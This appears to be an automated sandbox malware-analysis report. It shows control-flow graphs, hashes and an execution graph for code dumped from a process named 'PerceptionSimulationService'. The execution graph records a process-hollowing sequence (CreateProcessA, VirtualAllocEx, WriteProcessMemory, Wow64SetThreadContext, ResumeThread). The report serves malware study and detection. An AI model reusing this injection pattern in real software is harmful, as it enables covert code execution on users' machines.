                                                                                                                                                                      control_flow_graph 187 b15910-b15912 188 b15950-b15968 187->188 189 b15915-b15928 call b49970 187->189 188->189 191 b1596a 188->191 196 b159b8 call b30df0 189->196 192 b15970-b1597b 191->192 193 b1592f 191->193 197 b159d4 192->197 198 b1597d 192->198 193->189 195 b15931-b2072c 193->195 205 b20732-b20738 195->205 206 b20806-b20809 195->206 207 b159bd-b159c2 call b15d90 196->207 201 b159d8-b159de 197->201 202 b1593b-b15a15 call b311a0 197->202 198->197 203 b1597f-b15981 198->203 218 b15994-b1599c 201->218 220 b159e0 201->220 204 b15983-b15a38 203->204 204->218 219 b15a3e 204->219 211 b20800 205->211 212 b2073e 205->212 216 b2079d-b207a6 206->216 221 b159c7-b159ce 207->221 211->206 223 b206b3-b206b7 211->223 212->211 217 b20744-b20774 212->217 231 b20791-b20793 216->231 232 b207a8 216->232 236 b206d5-b206d9 217->236 237 b2077a-b2081c 217->237 225 b15a02 218->225 226 b1599e-b159f7 218->226 227 b15a2c-b15a34 219->227 220->218 233 b159e2-b159ec 220->233 228 b159d0 221->228 229 b15a1a-b15a26 221->229 223->216 230 b206bd 223->230 225->192 226->225 235 b159d9-b159de call b42190 227->235 228->229 239 b159d2 228->239 229->227 234 b159a1-b159b5 call b15e10 229->234 230->216 240 b206c3-b207fe 230->240 241 b207ca-b207cc 231->241 232->231 242 b207aa 232->242 243 b15a62-b15a6e 233->243 244 b159ee-b159ef 233->244 234->196 261 b15a08-b15a0b 234->261 235->218 235->220 251 b206db 236->251 252 b206df 236->252 237->216 239->235 240->211 242->241 246 b15a70 243->246 247 b15a75-b15ab3 call b31280 243->247 244->204 245 b159f1 244->245 245->189 246->247 259 b15a72 246->259 271 b15ab5 247->271 272 b15abb-b15af2 247->272 251->252 256 b206dd 251->256 252->216 256->252 262 b2c0cc 256->262 259->247 261->218 266 b15a0d 261->266 263 b2c0e8-b2c102 262->263 264 b2c0ce-b2c0d0 262->264 268 b2c0d2-b2c0df 263->268 269 b2c104 263->269 264->268 273 b15991 266->273 274 b15932 266->274 279 b2c0e7 268->279 269->268 269->279 271->272 277 b15ab7-b15ab9 271->277 281 b15af3 272->281 273->274 278 b15993 273->278 277->272 278->218 281->281
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: c86623dd15e431b7f1518f9efa52e135d17aa7f9559817b9a01ef62bbd585fbb
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: 24F10A3171CE58CFC769A71C68816BA77D2EBD9310FA846DED04EC3297DD249C468382
                                                                                                                                                                      Function 00B15B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 332 b15b42-b15b47 call b15d90 334 b15b4c-b15b52 332->334 336 b15c42-b15c62 call b31280 334->336 337 b15b0d 334->337 348 b15c24 336->348 349 b15c68 336->349 337->336 338 b15b13 337->338 340 b15c8f-b15c96 338->340 342 b15c29 340->342 343 b15c98-b15c9a 340->343 346 b15cc2-b15cc9 call b152a0 342->346 347 b15c2f-b15c36 342->347 345 b15c9c 343->345 353 b15bfa 345->353 354 b15d0e-b15d18 345->354 364 b15c69 346->364 365 b15ccb 346->365 347->346 352 b15c3c 347->352 355 b15c14-b15c19 348->355 356 b15c26 348->356 352->332 353->354 358 b15c00 353->358 359 b15d54 354->359 360 b15d1a 354->360 361 b15cc0 355->361 362 b15c20-b15c21 355->362 356->355 363 b15c28 356->363 358->355 369 b15d5f 359->369 368 b15d4b-b15d52 360->368 361->346 362->349 363->342 366 b15b68-b15d75 364->366 367 b15c6f 364->367 365->345 370 b15ccd 365->370 367->366 372 b15c75 367->372 368->359 373 b15d45-b15d47 368->373 376 b15d65 369->376 370->345 374 b15ccf-b15cdd 370->374 372->340 373->369 375 b15d49 373->375 377 b15cdf-b15ce4 CreateThread 374->377 375->368 375->369 376->376 378 b15c01-b15d41 377->378 379 b15cea 377->379 378->368 389 b15d43 378->389 379->378 380 b15cf0-b15cf6 379->380 380->362 382 b15cff-b15d01 380->382 383 b15bb4 382->383 384 b15d07 382->384 387 b15cda-b15cdd 383->387 384->383 386 b15d0d 384->386 387->377 389->359
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: 3e14b0f22196b1c74b942db9a03c67b504654d692119eaac2bd060765f9568b5
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: 5721AE3020CF45CFCB799F189898BF56AE1EBD5310FE801E68447CF2A6CA249CC49396
                                                                                                                                                                      Function 00B15B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 390 b15b09-b15b3b 394 b15cff-b15d01 390->394 395 b15bb4-b15ce4 CreateThread 394->395 396 b15d07 394->396 400 b15c01-b15d41 395->400 401 b15cea 395->401 396->395 397 b15d0d 396->397 408 b15d43 400->408 409 b15d4b-b15d52 400->409 401->400 402 b15cf0-b15cf6 401->402 402->394 404 b15c20-b15c68 402->404 410 b15d54 408->410 409->410 411 b15d45-b15d47 409->411 413 b15d5f 410->413 412 b15d49 411->412 411->413 412->409 412->413 414 b15d65 413->414 414->414
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: 91632e0bc15f6996493c619df13a944c8d28e62f1678bc17592af865e9825ece
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: E601C07010DF46CFDB755E24AC987FA6BE0EBD1324FE501EB8487CA091DAA449C0A792
                                                                                                                                                                      Function 00B15B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 415 b15b87-b15b99 CreateThread 418 b15cff-b15d01 415->418 419 b15bb4-b15ce4 CreateThread 418->419 420 b15d07 418->420 424 b15c01-b15d41 419->424 425 b15cea 419->425 420->419 421 b15d0d 420->421 432 b15d43 424->432 433 b15d4b-b15d52 424->433 425->424 426 b15cf0-b15cf6 425->426 426->418 428 b15c20-b15c68 426->428 434 b15d54 432->434 433->434 435 b15d45-b15d47 433->435 437 b15d5f 434->437 436 b15d49 435->436 435->437 436->433 436->437 438 b15d65 437->438 438->438
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: f115bc26a86017fb9e6d2ccb11b381b34155a7f297735a8a4c9f93dd644d4aea
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: 64E08C3060DB48CFDB6A9F249D6036A3AE5EBC8314F5902CFC48ADB1D1DF690D468792
                                                                                                                                                                      Function 00B1599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 439 b1599b-b1599e 440 b159f7 439->440 441 b15a02 440->441 443 b159d4 441->443 444 b1597d 441->444 445 b159d8-b159de 443->445 446 b1593b-b15a15 call b311a0 443->446 444->443 447 b1597f-b15981 444->447 453 b15994-b1599c 445->453 455 b159e0 445->455 448 b15983-b15a38 447->448 448->453 454 b15a3e 448->454 453->441 457 b1599e 453->457 458 b15a2c-b15a34 454->458 455->453 459 b159e2-b159ec 455->459 457->440 460 b159d9-b159de call b42190 458->460 461 b15a62-b15a6e 459->461 462 b159ee-b159ef 459->462 460->453 460->455 464 b15a70 461->464 465 b15a75-b15ab3 call b31280 461->465 462->448 463 b159f1 call b49970 462->463 476 b159b8 call b30df0 463->476 464->465 470 b15a72 464->470 477 b15ab5 465->477 478 b15abb-b15af2 465->478 470->465 481 b159bd-b159c2 call b15d90 476->481 477->478 480 b15ab7-b15ab9 477->480 485 b15af3 478->485 480->478 484 b159c7-b159ce 481->484 486 b159d0 484->486 487 b15a1a-b15a26 484->487 485->485 486->487 489 b159d2 486->489 487->458 488 b159a1-b159b5 call b15e10 487->488 488->476 492 b15a08-b15a0b 488->492 489->460 492->453 493 b15a0d 492->493 495 b15991 493->495 496 b15932 493->496 495->496 497 b15993 495->497 497->453
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: 9120ffe34ceebeda7ebf540127ecca9a0b95ce4dbac5763fe0392e67e7a47e6c
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction Fuzzy Hash: D301D67056DE84CFD6769B1854912F966D2FBD43A0FE805D6908ACB092C9244EC0A743
                                                                                                                                                                      Function 00B18090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 498 b18090-b18096 499 b18184 498->499 500 b18186 CloseHandle 499->500 501 b1818c-b18192 499->501 500->501 502 b18115-b18118 501->502 503 b18194 501->503 504 b180a7 502->504 505 b18119-b1811a 502->505 503->502 506 b1819a 503->506 505->504 507 b1811c 505->507 508 b1813c 506->508 509 b1820f 507->509 508->499 510 b18215-b1821e 509->510 511 b1808e-b18096 509->511 510->511 513 b18224 510->513 511->499 511->504 514 b181d7-b181e6 call b4715c 513->514 515 b18226 513->515 525 b18089 514->525 526 b180ca-b1810f GetTokenInformation 514->526 515->514 516 b18228-b182ee call b15d90 515->516 528 b182f0 516->528 529 b1830c-b1831e 516->529 525->526 527 b1808b 525->527 531 b18111 526->531 532 b1812d 526->532 536 b1808c 527->536 528->529 533 b182f2 528->533 534 b182a1-b182ba call b15d90 call b1ec00 529->534 535 b18320 529->535 531->532 539 b18113 531->539 540 b18133 532->540 541 b180a8 532->541 538 b182f7-b182fc call b15d90 533->538 534->535 537 b18322 535->537 535->538 536->511 537->538 543 b18324-b18326 537->543 559 b18253-b18265 call b31280 538->559 560 b18302 538->560 539->502 540->508 546 b181ed-b181f0 540->546 544 b180aa-b180ad 541->544 548 b18328 543->548 549 b18163-b18170 call b47164 544->549 550 b180b3-b18203 544->550 551 b181f6 546->551 552 b180da-b180f1 546->552 562 b18335 548->562 563 b182df-b1832b 548->563 549->500 571 b18172 549->571 550->549 568 b18209 550->568 551->552 558 b181fc 551->558 552->544 566 b181fe-b18201 GetTokenInformation 558->566 559->548 576 b1826b 559->576 560->559 567 b18308-b1830a 560->567 573 b1826e-b18285 562->573 563->562 575 b1832d-b18331 563->575 566->509 583 b181b7 566->583 567->529 571->501 577 b18287 573->577 578 b1829b-b1829d 573->578 575->562 576->573 581 b18239 576->581 582 b1824c 577->582 578->534 581->548 584 b1823f-b18243 581->584 582->578 585 b1824e-b18252 582->585 583->509 586 b181b9-b181ca 583->586 584->538 584->582 585->573 589 b181d0 586->589 590 b180f3 586->590 589->566 595 b180c3 589->595 590->536 591 b180f5 590->591 591->536 596 b18077 591->596 595->566 597 b180c9 595->597 596->514 597->526
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: f60023cfbd6d191ad8989aa80b9ead36d733b0a0263fdaf05cf80be0934b25d3
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: 0CC08C63228902F6523A02582C4F0F026C0F30F7A0BEC00CAEC06B0220ED248EF300A7
                                                                                                                                                                      Function 00B1817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 598 b1817f 599 b18184 598->599 600 b18186 CloseHandle 599->600 601 b1818c-b18192 599->601 600->601 602 b18115-b18118 601->602 603 b18194 601->603 604 b180a7 602->604 605 b18119-b1811a 602->605 603->602 606 b1819a 603->606 605->604 607 b1811c 605->607 608 b1813c 606->608 609 b1820f 607->609 608->599 610 b18215-b1821e 609->610 611 b1808e-b18096 609->611 610->611 613 b18224 610->613 611->599 611->604 614 b181d7-b181e6 call b4715c 613->614 615 b18226 613->615 625 b18089 614->625 626 b180ca-b1810f GetTokenInformation 614->626 615->614 616 b18228-b182ee call b15d90 615->616 628 b182f0 616->628 629 b1830c-b1831e 616->629 625->626 627 b1808b 625->627 631 b18111 626->631 632 b1812d 626->632 636 b1808c 627->636 628->629 633 b182f2 628->633 634 b182a1-b182ba call b15d90 call b1ec00 629->634 635 b18320 629->635 631->632 639 b18113 631->639 640 b18133 632->640 641 b180a8 632->641 638 b182f7-b182fc call b15d90 633->638 634->635 637 b18322 635->637 635->638 636->611 637->638 643 b18324-b18326 637->643 659 b18253-b18265 call b31280 638->659 660 b18302 638->660 639->602 640->608 646 b181ed-b181f0 640->646 644 b180aa-b180ad 641->644 648 b18328 643->648 649 b18163-b18170 call b47164 644->649 650 b180b3-b18203 644->650 651 b181f6 646->651 652 b180da-b180f1 646->652 662 b18335 648->662 663 b182df-b1832b 648->663 649->600 671 b18172 649->671 650->649 668 b18209 650->668 651->652 658 b181fc 651->658 652->644 666 b181fe-b18201 GetTokenInformation 658->666 659->648 676 b1826b 659->676 660->659 667 b18308-b1830a 660->667 673 b1826e-b18285 662->673 663->662 675 b1832d-b18331 663->675 666->609 683 b181b7 666->683 667->629 671->601 677 b18287 673->677 678 b1829b-b1829d 673->678 675->662 676->673 681 b18239 676->681 682 b1824c 677->682 678->634 681->648 684 b1823f-b18243 681->684 682->678 685 b1824e-b18252 682->685 683->609 686 b181b9-b181ca 683->686 684->638 684->682 685->673 689 b181d0 686->689 690 b180f3 686->690 689->666 695 b180c3 689->695 690->636 691 b180f5 690->691 691->636 696 b18077 691->696 695->666 697 b180c9 695->697 696->614 697->626
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: 021b111d36429bed50892296e30bf6594da9118aaf425d03ef74051aecf669e8
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: D2C04C62554505B6513626996C0A4E125D0A71B760B9C4492FC1676260E9544DE241A2

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:11.8%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:279
                                                                                                                                                                      Total number of Limit Nodes:13
                                                                                                                                                                      execution_graph 32912 8e3d011 32913 8e3cef4 32912->32913 32914 8e3cf03 32912->32914 32913->32914 32915 8e3e7d6 12 API calls 32913->32915 32916 8e3e768 12 API calls 32913->32916 32917 8e3e778 12 API calls 32913->32917 32915->32914 32916->32914 32917->32914 32561 8d45ac0 32565 8d45ad0 32561->32565 32576 8d45ae0 32561->32576 32562 8d45acb 32567 8d45ae0 32565->32567 32566 8d45b7b 32574 8d45ad0 GetCurrentThreadId 32566->32574 32575 8d45ae0 GetCurrentThreadId 32566->32575 32567->32566 32569 8d45bb0 32567->32569 32568 8d45b85 32568->32562 32573 8d45cb4 32569->32573 32587 8d44c9c 32569->32587 32572 8d44c9c GetCurrentThreadId 32572->32573 32573->32562 32574->32568 32575->32568 32578 8d45af5 32576->32578 32577 8d45b7b 32585 8d45ad0 GetCurrentThreadId 32577->32585 32586 8d45ae0 GetCurrentThreadId 32577->32586 32578->32577 32580 8d45bb0 32578->32580 32579 8d45b85 32579->32562 32581 8d44c9c GetCurrentThreadId 32580->32581 32584 8d45cb4 32580->32584 32582 8d45cd8 32581->32582 32583 8d44c9c GetCurrentThreadId 32582->32583 32583->32584 32584->32562 32585->32579 32586->32579 32588 8d44ca7 32587->32588 32589 8d45fff GetCurrentThreadId 32588->32589 32590 8d45cd8 32588->32590 32589->32590 32590->32572 32611 8d46a70 32615 8d46a98 32611->32615 32619 8d46aa8 32611->32619 32612 8d46a8f 32616 8d46ab1 32615->32616 32623 8d46ae0 32616->32623 32617 8d46ad6 32617->32612 32620 8d46ab1 32619->32620 32622 8d46ae0 DrawTextExW 32620->32622 32621 8d46ad6 32621->32612 32622->32621 32624 8d46b2b 32623->32624 32625 8d46b1a 32623->32625 32626 8d46bb9 32624->32626 32629 8d47220 32624->32629 32634 8d47212 32624->32634 32625->32617 32626->32617 32630 8d47248 32629->32630 32631 8d4734e 32630->32631 32639 8d47938 32630->32639 32644 8d47928 32630->32644 32631->32625 32635 8d47248 32634->32635 32636 8d4734e 32635->32636 32637 8d47938 DrawTextExW 32635->32637 32638 8d47928 DrawTextExW 32635->32638 32636->32625 32637->32636 32638->32636 32640 8d4794e 32639->32640 32649 8d47d58 32640->32649 32653 8d47d49 32640->32653 32641 8d479c4 32641->32631 32645 8d4794e 32644->32645 32647 8d47d58 DrawTextExW 32645->32647 32648 8d47d49 DrawTextExW 32645->32648 32646 8d479c4 32646->32631 32647->32646 32648->32646 32658 8d47d98 32649->32658 32663 8d47d89 32649->32663 32650 8d47d76 32650->32641 32654 8d47d58 32653->32654 32656 8d47d98 DrawTextExW 32654->32656 32657 8d47d89 DrawTextExW 32654->32657 32655 8d47d76 32655->32641 32656->32655 32657->32655 32659 8d47dc9 32658->32659 32660 8d47df6 32659->32660 32668 8d47e18 32659->32668 32673 8d47e09 32659->32673 32660->32650 32664 8d47d98 32663->32664 32665 8d47df6 32664->32665 32666 8d47e18 DrawTextExW 32664->32666 32667 8d47e09 DrawTextExW 32664->32667 32665->32650 32666->32665 32667->32665 32670 8d47e39 32668->32670 32669 8d47e4e 32669->32660 32670->32669 32678 8d470e8 32670->32678 32672 8d47eb9 32675 8d47e18 32673->32675 32674 8d47e4e 32674->32660 32675->32674 32676 8d470e8 DrawTextExW 32675->32676 32677 8d47eb9 32676->32677 32680 8d470f3 32678->32680 32679 8d49e89 32679->32672 32680->32679 32684 8d4aa00 32680->32684 32687 8d4a9ef 32680->32687 32681 8d49f9c 32681->32672 32691 8d49a34 32684->32691 32688 8d4aa00 32687->32688 32689 8d49a34 DrawTextExW 32688->32689 32690 8d4aa1d 32689->32690 32690->32681 32692 8d4aa38 DrawTextExW 32691->32692 32694 8d4aa1d 32692->32694 32694->32681 32591 867910 32592 86791b 32591->32592 32594 867a48 32591->32594 32595 867a6d 32594->32595 32599 867f50 32595->32599 32603 867f60 32595->32603 32600 867f87 32599->32600 32601 868064 32600->32601 32607 867bac 32600->32607 32605 867f87 32603->32605 32604 868064 32604->32604 32605->32604 32606 867bac CreateActCtxA 32605->32606 32606->32604 32608 868ff0 CreateActCtxA 32607->32608 32610 8690b3 32608->32610 32695 86e5e0 32696 86e622 32695->32696 32697 86e628 GetModuleHandleW 32695->32697 32696->32697 32698 86e655 32697->32698 32699 8e3d088 32700 8e3d2c1 32699->32700 32701 8e3cef4 32699->32701 32702 8e3cf03 32701->32702 32706 8e3e768 32701->32706 32720 8e3e7d6 32701->32720 32735 8e3e778 32701->32735 32707 8e3e778 32706->32707 32708 8e3e7b6 32707->32708 32749 8e3efe4 32707->32749 32754 8e3f0bc 32707->32754 32759 8e3f01c 32707->32759 32764 8e3ed5f 32707->32764 32769 8e3ed98 32707->32769 32774 8e3ef1a 32707->32774 32778 8e3ef9a 32707->32778 32783 8e3ee96 32707->32783 32788 8e3ec90 32707->32788 32796 8e3ebe4 32707->32796 32800 8e3f104 32707->32800 32708->32702 32721 8e3e764 32720->32721 32722 8e3e7d9 32720->32722 32723 8e3efe4 2 API calls 32721->32723 32724 8e3f104 2 API calls 32721->32724 32725 8e3ebe4 2 API calls 32721->32725 32726 8e3ec90 4 API calls 32721->32726 32727 8e3ee96 2 API calls 32721->32727 32728 8e3e7b6 32721->32728 32729 8e3ef9a 2 API calls 32721->32729 32730 8e3ef1a 2 API calls 32721->32730 32731 8e3ed98 2 API calls 32721->32731 32732 8e3ed5f 2 API calls 32721->32732 32733 8e3f01c 2 API calls 32721->32733 32734 8e3f0bc 2 API calls 32721->32734 32722->32702 32723->32728 32724->32728 32725->32728 32726->32728 32727->32728 32728->32702 32729->32728 32730->32728 32731->32728 32732->32728 32733->32728 32734->32728 32736 8e3e792 32735->32736 32737 8e3e7b6 32736->32737 32738 8e3efe4 2 API calls 32736->32738 32739 8e3f104 2 API calls 32736->32739 32740 8e3ebe4 2 API calls 32736->32740 32741 8e3ec90 4 API calls 32736->32741 32742 8e3ee96 2 API calls 32736->32742 32743 8e3ef9a 2 API calls 32736->32743 32744 8e3ef1a 2 API calls 32736->32744 32745 8e3ed98 2 API calls 32736->32745 32746 8e3ed5f 2 API calls 32736->32746 32747 8e3f01c 2 API calls 32736->32747 32748 8e3f0bc 2 API calls 32736->32748 32737->32702 32738->32737 32739->32737 32740->32737 32741->32737 32742->32737 32743->32737 32744->32737 32745->32737 32746->32737 32747->32737 32748->32737 32750 8e3efea 32749->32750 32805 8e3c600 32750->32805 32809 8e3c608 32750->32809 32751 8e3f213 32751->32708 32755 8e3f0c2 32754->32755 32756 8e3ec58 32755->32756 32813 8e3c940 32755->32813 32817 8e3c939 32755->32817 32756->32708 32760 8e3effb 32759->32760 32762 8e3c600 ResumeThread 32760->32762 32763 8e3c608 ResumeThread 32760->32763 32761 8e3f213 32761->32708 32762->32761 32763->32761 32765 8e3f477 32764->32765 32821 8e3c788 32765->32821 32825 8e3c790 32765->32825 32766 8e3f495 32770 8e3ed9e 32769->32770 32772 8e3c940 ReadProcessMemory 32770->32772 32773 8e3c939 ReadProcessMemory 32770->32773 32771 8e3ec58 32771->32708 32772->32771 32773->32771 32829 8e3c850 32774->32829 32833 8e3c848 32774->32833 32775 8e3ef48 32775->32708 32779 8e3eeb4 32778->32779 32780 8e3eed5 32779->32780 32781 8e3c850 WriteProcessMemory 32779->32781 32782 8e3c848 WriteProcessMemory 32779->32782 32781->32780 32782->32780 32784 8e3ee9c 32783->32784 32786 8e3c850 WriteProcessMemory 32784->32786 32787 8e3c848 WriteProcessMemory 32784->32787 32785 8e3eed5 32786->32785 32787->32785 32789 8e3ec97 32788->32789 32792 8e3c850 WriteProcessMemory 32789->32792 32793 8e3c848 WriteProcessMemory 32789->32793 32790 8e3ecb8 32791 8e3f568 32790->32791 32837 8e3c6b0 32790->32837 32841 8e3c6b8 32790->32841 32791->32708 32792->32790 32793->32790 32845 8e3cad8 32796->32845 32849 8e3cacc 32796->32849 32801 8e3f111 32800->32801 32803 8e3c600 ResumeThread 32801->32803 32804 8e3c608 ResumeThread 32801->32804 32802 8e3f213 32802->32708 32803->32802 32804->32802 32806 8e3c608 ResumeThread 32805->32806 32808 8e3c679 32806->32808 32808->32751 32810 8e3c648 ResumeThread 32809->32810 32812 8e3c679 32810->32812 32812->32751 32814 8e3c98b ReadProcessMemory 32813->32814 32816 8e3c9cf 32814->32816 32816->32756 32818 8e3c98b ReadProcessMemory 32817->32818 32820 8e3c9cf 32818->32820 32820->32756 32822 8e3c790 VirtualAllocEx 32821->32822 32824 8e3c80d 32822->32824 32824->32766 32826 8e3c7d0 VirtualAllocEx 32825->32826 32828 8e3c80d 32826->32828 32828->32766 32830 8e3c898 WriteProcessMemory 32829->32830 32832 8e3c8ef 32830->32832 32832->32775 32834 8e3c898 WriteProcessMemory 32833->32834 32836 8e3c8ef 32834->32836 32836->32775 32838 8e3c6b8 Wow64SetThreadContext 32837->32838 32840 8e3c745 32838->32840 32840->32790 32842 8e3c6fd Wow64SetThreadContext 32841->32842 32844 8e3c745 32842->32844 32844->32790 32846 8e3cb61 32845->32846 32846->32846 32847 8e3ccc6 CreateProcessA 32846->32847 32848 8e3cd23 32847->32848 32848->32848 32850 8e3cad8 CreateProcessA 32849->32850 32852 8e3cd23 32850->32852 32853 8e31448 32854 8e3145d 32853->32854 32860 8e31482 32854->32860 32864 8e31534 32854->32864 32871 8e314f5 32854->32871 32875 8e31490 32854->32875 32855 8e31476 32862 8e31490 32860->32862 32861 8e31338 PostMessageW 32861->32862 32862->32861 32863 8e315fc 32862->32863 32863->32855 32879 8e31338 32864->32879 32866 8e3153f 32867 8e31338 PostMessageW 32866->32867 32869 8e314da 32866->32869 32867->32869 32868 8e31338 PostMessageW 32868->32869 32869->32868 32870 8e315fc 32869->32870 32870->32855 32870->32870 32874 8e31504 32871->32874 32872 8e31338 PostMessageW 32873 8e3152d 32872->32873 32874->32872 32877 8e314b7 32875->32877 32876 8e31338 PostMessageW 32876->32877 32877->32876 32878 8e315fc 32877->32878 32878->32855 32880 8e31348 32879->32880 32881 8e31358 32880->32881 32884 8e3f8a8 32880->32884 32891 8e3f938 32880->32891 32881->32866 32885 8e3f8ab 32884->32885 32886 8e3f8eb 32885->32886 32889 8e3f967 32885->32889 32887 8e3f8f3 32886->32887 32890 8e3f8a8 PostMessageW 32886->32890 32887->32881 32889->32887 32895 8e394f8 32889->32895 32890->32887 32892 8e3f944 